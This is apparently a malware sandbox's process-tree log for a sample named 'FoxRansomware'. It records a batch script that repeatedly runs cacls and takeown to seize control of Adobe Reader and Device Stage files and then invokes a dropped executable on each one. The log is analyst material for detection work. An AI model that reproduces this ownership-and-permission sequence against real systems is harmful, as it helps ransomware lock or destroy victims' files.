C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:5924
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵
- Modifies file permissions
PID:1596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "RTC.der" -nobanner3⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "RTC.der" -nobanner4⤵
- Executes dropped EXE
PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:4832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵
- Modifies file permissions
PID:4876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "end_review.gif" -nobanner3⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "end_review.gif" -nobanner4⤵PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:4976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:4996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:5036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:5992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:6020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:6028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_ok.gif" -nobanner3⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "server_ok.gif" -nobanner4⤵PID:6048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:6100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:4676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵
- Modifies file permissions
PID:3696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "warning.gif" -nobanner3⤵PID:3692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "warning.gif" -nobanner4⤵PID:2736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:2492
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:5068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:4872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:4332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:5088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:4348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:4388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SY______.PFB" -nobanner3⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SY______.PFB" -nobanner4⤵PID:5104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:1600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:2556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵PID:2740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt.hyp" -nobanner3⤵PID:692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "brt.hyp" -nobanner4⤵PID:1616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:2780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:3396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eng32.clx" -nobanner3⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "eng32.clx" -nobanner4⤵PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:3516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:1144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:2232
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:3600
-
  depth 3 | PID 3640 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
  depth 3 | PID 3664 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
  depth 3 | PID 3840 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "UKRAINE.TXT" -nobanner
    depth 4 | PID 3868 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "UKRAINE.TXT" -nobanner
  depth 3 | PID 3896 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 2548 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  depth 3 | PID 3232 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
  depth 3 | PID 1564 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" | Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 2212 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    depth 4 | PID 2336 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner
  depth 3 | PID 5264 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 2560 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  depth 3 | PID 5300 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
  depth 3 | PID 5312 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" | Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 5352 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    depth 4 | PID 5372 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner
  depth 3 | PID 5392 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 1140 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  depth 3 | PID 5420 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
  depth 3 | PID 5428 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
  depth 3 | PID 5412 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AUMProduct.cer" -nobanner
    depth 4 | PID 5456 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "AUMProduct.cer" -nobanner
  depth 3 | PID 5476 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5460 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  depth 3 | PID 5500 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
  depth 3 | PID 5464 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 5468 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "superbar.png" -nobanner
    depth 4 | PID 5532 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "superbar.png" -nobanner
  depth 3 | PID 5528 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5944 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  depth 3 | PID 1972 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
  depth 3 | PID 2456 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" | Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 1068 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    depth 4 | PID 2764 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner
  depth 3 | PID 2660 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 1604 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  depth 3 | PID 3032 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
  depth 3 | PID 2688 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
  depth 3 | PID 5164 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "email_all.gif" -nobanner
    depth 4 | PID 5156 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "email_all.gif" -nobanner
  depth 3 | PID 5216 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5196 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  depth 3 | PID 5136 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
  depth 3 | PID 1996 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" | Modifies file permissions
  depth 3 | PID 2628 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "open_original_form.gif" -nobanner
    depth 4 | PID 2844 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "open_original_form.gif" -nobanner
  depth 3 | PID 2832 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 1224 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  depth 3 | PID 1992 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
  depth 3 | PID 5220 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" | Modifies file permissions
  depth 3 | PID 2224 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "rss.gif" -nobanner
    depth 4 | PID 2004 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "rss.gif" -nobanner
  depth 3 | PID 2104 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 2252 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  depth 3 | PID 1064 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
  depth 3 | PID 1092 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" | Modifies file permissions
  depth 3 | PID 1960 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    depth 4 | PID 3064 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
  depth 3 | PID 1200 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 2836 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  depth 3 | PID 2476 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
  depth 3 | PID 1824 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" | Modifies file permissions
  depth 3 | PID 1136 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    depth 4 | PID 1316 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "CourierStd-Oblique.otf" -nobanner
  depth 3 | PID 2804 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 2428 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  depth 3 | PID 3112 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
  depth 3 | PID 2360 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
  depth 3 | PID 1052 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SY______.PFM" -nobanner
    depth 4 | PID 1760 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "SY______.PFM" -nobanner
  depth 3 | PID 1456 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 3192 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  depth 3 | PID 1668 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
  depth 3 | PID 2680 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
  depth 3 | PID 2444 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    depth 4 | PID 2440 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
  depth 3 | PID 2588 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 2056 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  depth 3 | PID 2184 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
  depth 3 | PID 2040 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" | Modifies file permissions
  depth 3 | PID 3988 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can129.hsp" -nobanner
    depth 4 | PID 3288 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "can129.hsp" -nobanner
  depth 3 | PID 3948 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 2916 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  depth 3 | PID 3260 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
  depth 3 | PID 3996 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" | Modifies file permissions
  depth 3 | PID 3208 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "icudt26l.dat" -nobanner
    depth 4 | PID 3280 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "icudt26l.dat" -nobanner
  depth 3 | PID 4064 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 3448 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  depth 3 | PID 3520 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
  depth 3 | PID 3552 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
